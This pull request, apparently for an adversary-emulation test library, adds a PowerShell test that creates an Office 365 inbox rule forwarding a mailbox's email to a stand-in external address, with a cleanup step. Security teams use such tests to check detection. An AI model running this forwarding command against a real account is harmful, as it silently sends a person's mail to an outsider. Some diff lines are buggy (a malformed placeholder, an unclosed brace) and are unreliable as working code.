### PR TITLE
Created email forwarding T1114.003

### DIFF
--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -20,6 +20,10 @@ atomic_tests:
       description: email rule name
       type: String
       default: "Atomic Red Team Email Rule"
+    forwarding_email:
+      description: email rule name
+      type: String
+      default: "Atomic_Operator@at0mic.com"
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -36,7 +40,7 @@ atomic_tests:
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-ExchangeOnline -Credential $creds
-      New-InboxRule -Name "#{rule_name}" -ForwardTo 'Atomic_Operator@example.com'
+      New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
     cleanup_command: |
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd

--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -1,0 +1,46 @@
+attack_technique: T1114.003
+display_name: 'Email Collection: Email Forwarding Rule'
+atomic_tests:
+- name: Office365 - Email Forwarding
+  auto_generated_guid: 
+  description: |
+    Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.
+  supported_platforms:
+  - office-365
+  input_arguments:
+    username:
+      description: office-365 username
+      type: String
+      default: null
+    password:
+      description: office-365 password
+      type: String
+      default: null
+    rule_name:
+      description: email rule name
+      type: String
+      default: "Atomic Red Team Email Rule"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      ExchangeOnlineManagement PowerShell module must be installed. Your user must also have an Exchange license. 
+    prereq_command: |
+      $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name ExchangeOnlineManagement         
+      Import-Module ExchangeOnlineManagement
+  executor:
+    command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-ExchangeOnline -Credential $creds
+      New-InboxRule -Name "#{rule_name}-" -ForwardTo 'Atomic_Operator@example.com'
+    cleanup_command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-ExchangeOnline -Credential $creds
+      Get-InboxRule | Where-Object { $_.Name -eq 'Atomic Red Team Email Rule' } | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
+    name: powershell
+    elevation_required: false

--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -21,7 +21,7 @@ atomic_tests:
       type: String
       default: "Atomic Red Team Email Rule"
     forwarding_email:
-      description: email rule name
+      description: destination email addresses
       type: String
       default: "Atomic_Operator@at0mic.com"
   dependency_executor_name: powershell

--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -9,11 +9,11 @@ atomic_tests:
   - office-365
   input_arguments:
     username:
-      description: office-365 username
+      description: office 365 username
       type: String
       default: null
     password:
-      description: office-365 password
+      description: office 365 password
       type: String
       default: null
     rule_name:

--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -23,7 +23,7 @@ atomic_tests:
     forwarding_email:
       description: destination email addresses
       type: String
-      default: "Atomic_Operator@at0mic.com"
+      default: "Atomic_Operator@fakeemail.aq"
   dependency_executor_name: powershell
   dependencies:
   - description: |

--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -9,11 +9,11 @@ atomic_tests:
   - office-365
   input_arguments:
     username:
-      description: office 365 username
+      description: office-365 username
       type: String
       default: null
     password:
-      description: office 365 password
+      description: office-365 password
       type: String
       default: null
     rule_name:
@@ -36,11 +36,11 @@ atomic_tests:
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-ExchangeOnline -Credential $creds
-      New-InboxRule -Name "#{rule_name}-" -ForwardTo 'Atomic_Operator@example.com'
+      New-InboxRule -Name "#{rule_name}" -ForwardTo 'Atomic_Operator@example.com'
     cleanup_command: |
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-ExchangeOnline -Credential $creds
-      Get-InboxRule | Where-Object { $_.Name -eq 'Atomic Red Team Email Rule' } | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
+      Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
     name: powershell
     elevation_required: false

--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -2,7 +2,7 @@ attack_technique: T1114.003
 display_name: 'Email Collection: Email Forwarding Rule'
 atomic_tests:
 - name: Office365 - Email Forwarding
-  auto_generated_guid: 
+  auto_generated_guid: 3234117e-151d-4254-9150-3d0bac41e38c
   description: |
     Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.
   supported_platforms:


### PR DESCRIPTION
**Details:**
<!-- Insert details about this change here. Please include as much detail as possible -->
Generated new ART test for email forwarding in O365 via the PowerShell cmdlet `New-InboxRule`. Authentication is handle the same as other O365 tests (T1562.008).

**Testing:**
<!-- Note any testing done, local or automated here. -->
Ran tests via Invoke-AtomicTest, inbox rules is created and verified via `Get-InboxRule`. Cleanup also will remove all the email rules created as long as they match the optional "rule_name" input argument. 

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->